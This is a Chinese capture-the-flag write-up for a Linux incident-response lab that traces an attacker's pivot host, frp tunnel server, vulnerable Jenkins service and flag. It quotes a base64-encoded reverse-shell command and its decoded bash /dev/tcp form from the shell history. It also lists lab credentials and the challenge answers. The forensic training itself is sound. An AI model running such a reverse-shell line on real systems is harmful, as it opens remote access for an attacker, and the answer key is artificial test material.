知工善防Linux-应急响应靶场 - easy溯源WriteUP

应急响应靶场 - easy溯源 操作指南与题目解析

一、靶场准备步骤

在启动靶机前,需完成以下配置,确保VMware可正常加载靶机。

1. VMX文件版本适配

靶机压缩包解压后,需根据本地VMware版本修改虚拟机配置文件:

  • 找到文件 应急响应靶场 - easy溯源.vmx
  • 用记事本/Notepad++打开,找到行 virtualHW.version = "21"
  • 将版本号 21 改为与本地VMware兼容的版本(示例中改为 17,具体版本需根据自身VMware版本调整)

2. 靶机基础账户信息

靶机默认提供普通用户账户,用于初始登录:

  • 账户名:zgsfsys
  • 密码:zgsfsys

3. 修改root密码

题目未提供root密码,需通过普通用户登录后修改,操作命令如下:

1
2
3
# 执行sudo命令修改root密码,先输入当前普通用户密码(zgsfsys)验证权限
sudo passwd root
# 按提示输入新的root密码(建议设置为易记密码,如123456),并重复确认

4. 初始信息查看

打开靶机后,首先查看桌面的 password.txt 文件,记录其中的Web服务地址与账户,后续可能用到:

1
2
3
4
5
6
7
8
9
10
11
1. https://127.0.0.1:15493/c536062c
   - username: fidiyixb
   - password: 0f48abfd

2. http://127.0.0.1:6631/
   - username: admin
   - password: BnGDPepT3P4BsxR

3. http://127.0.0.1:6565/
   - username: admin
   - password: admin148849464348

二、题目解析与解答

1. 攻击者内网跳板机IP地址

分析过程

  1. 以普通用户 zgsfsys 身份登录靶机,执行 history 命令查看历史操作记录,发现关键命令:
    1
    2
    # 历史记录中存在一条base64编码的反弹shell命令
    55  echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjEyOS8xMjM0IDA+JjE= | base64 --decode | bash
  2. 对编码内容进行Base64解密,得到原始反弹shell命令:
    1
    2
    # 解密后命令(指向攻击者内网跳板机IP和端口)
    bash -i >& /dev/tcp/192.168.11.129/1234 0>&1
  3. 命令中 /dev/tcp/ 后的IP 192.168.11.129 即为攻击者内网跳板机IP。

答案

192.168.11.129

2. 攻击者服务器地址

分析过程

  1. 切换至root用户(使用步骤1.3中修改的root密码),通常恶意配置文件会藏于 /root/home 或服务目录下。
  2. /root/chuantou/ 目录下找到 frpc.toml 文件(frp是常见的内网穿透工具,用于连接攻击者服务器)。
  3. 打开 frpc.toml 文件,其中记录的远程服务器IP即为攻击者服务器地址。

frpc.toml文件位置

答案

156.66.33.66

3. 存在漏洞的服务(提示:7个字符)

分析过程

  1. 查看普通用户 zgsfsys 的历史操作,发现多条查看Jenkins日志的命令,暗示Jenkins服务可能存在异常:
    1
    2
    3
    # 查看Jenkins日志,可能在寻找后门密码或漏洞利用痕迹
    sudo cat /var/log/jenkins/jenkins.log
    sudo cat /var/log/jenkins/jenkins.log | grep 12
  2. 结合浏览器记录,发现靶机曾访问过Jenkins服务(默认端口8080),需将日志中的 127.0.0.1 替换为靶机实际DHCP分配的IP(如 192.168.11.130),访问 http://[靶机IP]:8080 可打开Jenkins页面。

浏览器Jenkins记录1
浏览器Jenkins记录2

  1. 使用Wappalyzer工具分析页面指纹,确认服务为Jenkins,且字符数为7,符合提示要求。

Wappalyzer识别Jenkins

答案

jenkins

4. 攻击者留下的flag(格式zgsf{})

分析过程

  1. 访问Jenkins服务(http://[靶机IP]:8080),在页面中直接找到攻击者留下的flag信息。
  2. flag格式符合 zgsf{} 要求,内容与靶场标识相关。

答案

zgsf{gongzhonghaozhigongshanfangshiyanshi}

5. 攻击者邮箱地址 & 6. 攻击者的ID名称

说明

经全面排查靶机文件(如日志、配置文件、用户目录、Web服务目录等),未发现与“攻击者邮箱地址”和“攻击者ID名称”相关的有效信息,目前暂无解。

5、6题无解提示